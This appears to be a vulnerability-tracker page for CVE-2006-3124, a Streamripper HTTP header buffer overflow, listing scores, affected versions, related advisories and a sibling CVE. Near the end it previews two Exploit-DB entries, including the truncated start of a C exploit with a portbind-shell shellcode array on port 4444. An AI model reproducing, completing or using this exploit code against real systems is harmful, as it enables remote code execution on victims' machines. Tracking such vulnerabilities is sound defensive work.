CVE-2006-3124
published 2006-08-26CVE-2006-3124: Buffer overflow in the HTTP header parsing in Streamripper before 1.61.26 allows remote attackers to cause a denial of service and possibly execute arbitrary…
PriorityP349high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
18.68%
96.9th percentile
Buffer overflow in the HTTP header parsing in Streamripper before 1.61.26 allows remote attackers to cause a denial of service and possibly execute arbitrary code via crafted HTTP headers.
Affected
16 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | streamripper | < streamripper 1.61.25-2 (bookworm) | streamripper 1.61.25-2 (bookworm) |
| debian | streamripper | < streamripper 1.62.2-1 (bookworm) | streamripper 1.62.2-1 (bookworm) |
| streamripper | streamripper | — | — |
| streamripper | streamripper | — | — |
| streamripper | streamripper | — | — |
| streamripper | streamripper | — | — |
| streamripper | streamripper | — | — |
| streamripper | streamripper | — | — |
| streamripper | streamripper | >= 0 < 1.62.2-1 | 1.62.2-1 |
| streamripper | streamripper | >= 0 < 1.61.25-2 | 1.61.25-2 |
| streamripper | streamripper | >= 0 < 1.62.2-1 | 1.62.2-1 |
| streamripper | streamripper | >= 0 < 1.61.25-2 | 1.61.25-2 |
| streamripper | streamripper | >= 0 < 1.62.2-1 | 1.62.2-1 |
| streamripper | streamripper | >= 0 < 1.61.25-2 | 1.61.25-2 |
| streamripper | streamripper | >= 0 < 1.62.2-1 | 1.62.2-1 |
| streamripper | streamripper | >= 0 < 1.61.25-2 | 1.61.25-2 |
CVSS provenance
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
osv7.5HIGH
vendor_debian7.5LOW
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Debian
CVE-2007-4337: streamripper - Multiple buffer overflows in the httplib_parse_sc_header function in lib/http.c ...
vendor_debian·2007·CVSS 7.5
CVE-2007-4337 [HIGH] CVE-2007-4337: streamripper - Multiple buffer overflows in the httplib_parse_sc_header function in lib/http.c ...
Multiple buffer overflows in the httplib_parse_sc_header function in lib/http.c in Streamripper before 1.62.2 allow remote attackers to execute arbitrary code via long (1) Location and (2) Server HTTP headers, a different vulnerability than CVE-2006-3124.
Scope: local
bookworm: resolved (fixed in 1.62.2-1)
bullseye: resolved (fixed in 1.62.2-1)
forky: resolved (fixed in 1.62.2-1)
sid: resolved (fixed in 1.62.2-1)
trixie: resolved (fixed in 1.62.2-1)
Debian
CVE-2006-3124: streamripper - Buffer overflow in the HTTP header parsing in Streamripper before 1.61.26 allows...
vendor_debian·2006·CVSS 7.5
CVE-2006-3124 [HIGH] CVE-2006-3124: streamripper - Buffer overflow in the HTTP header parsing in Streamripper before 1.61.26 allows...
Buffer overflow in the HTTP header parsing in Streamripper before 1.61.26 allows remote attackers to cause a denial of service and possibly execute arbitrary code via crafted HTTP headers.
Scope: local
bookworm: resolved (fixed in 1.61.25-2)
bullseye: resolved (fixed in 1.61.25-2)
forky: resolved (fixed in 1.61.25-2)
sid: resolved (fixed in 1.61.25-2)
trixie: resolved (fixed in 1.61.25-2)
GHSA
GHSA-jrqj-hpcm-6c55: Buffer overflow in the HTTP header parsing in Streamripper before 1
ghsa_unreviewed·2022-05-01
CVE-2006-3124 [HIGH] GHSA-jrqj-hpcm-6c55: Buffer overflow in the HTTP header parsing in Streamripper before 1
Buffer overflow in the HTTP header parsing in Streamripper before 1.61.26 allows remote attackers to cause a denial of service and possibly execute arbitrary code via crafted HTTP headers.
GHSA
GHSA-423v-6jmc-4fwg: Multiple buffer overflows in the httplib_parse_sc_header function in lib/http
ghsa_unreviewed·2022-05-01·CVSS 7.5
CVE-2007-4337 [HIGH] CWE-119 GHSA-423v-6jmc-4fwg: Multiple buffer overflows in the httplib_parse_sc_header function in lib/http
Multiple buffer overflows in the httplib_parse_sc_header function in lib/http.c in Streamripper before 1.62.2 allow remote attackers to execute arbitrary code via long (1) Location and (2) Server HTTP headers, a different vulnerability than CVE-2006-3124.
OSV
CVE-2007-4337: Multiple buffer overflows in the httplib_parse_sc_header function in lib/http
osv·2007-08-14·CVSS 7.5
CVE-2007-4337 [HIGH] CVE-2007-4337: Multiple buffer overflows in the httplib_parse_sc_header function in lib/http
Multiple buffer overflows in the httplib_parse_sc_header function in lib/http.c in Streamripper before 1.62.2 allow remote attackers to execute arbitrary code via long (1) Location and (2) Server HTTP headers, a different vulnerability than CVE-2006-3124.
OSV
CVE-2006-3124: Buffer overflow in the HTTP header parsing in Streamripper before 1
osv·2006-08-26·CVSS 7.5
CVE-2006-3124 [HIGH] CVE-2006-3124: Buffer overflow in the HTTP header parsing in Streamripper before 1
Buffer overflow in the HTTP header parsing in Streamripper before 1.61.26 allows remote attackers to cause a denial of service and possibly execute arbitrary code via crafted HTTP headers.
No detection rules found.
Exploit-DB
Streamripper 1.61.25 - HTTP Header Parsing Buffer Overflow (1)
exploitdb·2006-08-29
CVE-2006-3124 Streamripper 1.61.25 - HTTP Header Parsing Buffer Overflow (1)
Streamripper 1.61.25 - HTTP Header Parsing Buffer Overflow (1)
---
/*
_______ ________ .__ _____ __
___ __\ _ \ ____ \_____ \ | |__ / | | ____ | | __
\ \/ / /_\ \ / \ _(__ __|_ \
\/ \/ \/ \/ 29\08\06 \/ |__| \/ \/
* mm. dM8
* YMMMb. dMM8 _____________________________________
* YMMMMb dMMM' [ ]
* `YMMMb dMMMP [ There are doors I have yet to open ]
* `YMMM MMM' [ windows I have yet to look through ]
* "MbdMP [ Going forward may not be the answer ]
* .dMMMMMM.P [ ]
* dMM MMMMMM [ maybe I should go back ]
* 8MMMMMMMMMMI [_____________________________________]
* YMMMMMMMMM www.netbunny.org
* "MMMMMMP
* MxM .mmm
* W"W """
[i] Title: Streamripper HTTP Header Parsing Buffer Overflow Exploit
[i] Discovered by: Ulf Harnhammar
[i] Exploit by: Expanders
[i] References: https://www.securityfocus.co
Exploit-DB
Streamripper 1.61.25 - HTTP Header Parsing Buffer Overflow (2)
exploitdb·2006-08-29
CVE-2006-3124 Streamripper 1.61.25 - HTTP Header Parsing Buffer Overflow (2)
Streamripper 1.61.25 - HTTP Header Parsing Buffer Overflow (2)
---
/*
* name: streamripper exploit.exe 80 0
* [ public-release ]
* streamripper streamripper.exe http://127.0.0.1:80
* Connecting...
*
* on other shell
* [+] client conneted!
* [+] exploit send check shell on port 4444
*
* now connect to 127.0.0.1:4444
*/
/* #define _WIN32 */
#include
#include
#include
#ifdef _WIN32
#include
#pragma comment(lib, "ws2_32")
#else
#include
#include
#include
#endif
/* portbind shellcode port 4444*/
unsigned char portbindsc[] =
"\x29\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xaf"
"\xbf\xf8\x2a\x83\xeb\xfc\xe2\xf4\x53\xd5\x13\x67\x47\x46\x07\xd5"
"\x50\xdf\x73\x46\x8b\x9b\x73\x6f\x93\x34\x84\x2f\xd7\xbe\x17\xa1"
"\xe0\xa7\x73\x75\x8f\xbe\x13\x63\x24\x8b\x73\x2b\x41\x8e\x38\xb3"
"
No writeups or analysis indexed.
http://downloads.securityfocus.com/vulnerabilities/exploits/streamripper-aug292006.chttp://secunia.com/advisories/21579http://secunia.com/advisories/21658http://secunia.com/advisories/21749http://secunia.com/advisories/21801http://security.gentoo.org/glsa/glsa-200609-01.xmlhttp://sourceforge.net/project/shownotes.php?release_id=442126http://www.debian.org/security/2006/dsa-1158http://www.novell.com/linux/security/advisories/2006_21_sr.htmlhttp://www.osvdb.org/28178http://www.securityfocus.com/bid/19707http://www.vupen.com/english/advisories/2006/3387https://exchange.xforce.ibmcloud.com/vulnerabilities/28567http://downloads.securityfocus.com/vulnerabilities/exploits/streamripper-aug292006.chttp://secunia.com/advisories/21579http://secunia.com/advisories/21658http://secunia.com/advisories/21749http://secunia.com/advisories/21801http://security.gentoo.org/glsa/glsa-200609-01.xmlhttp://sourceforge.net/project/shownotes.php?release_id=442126http://www.debian.org/security/2006/dsa-1158http://www.novell.com/linux/security/advisories/2006_21_sr.htmlhttp://www.osvdb.org/28178http://www.securityfocus.com/bid/19707http://www.vupen.com/english/advisories/2006/3387https://exchange.xforce.ibmcloud.com/vulnerabilities/28567
2006-08-26
Published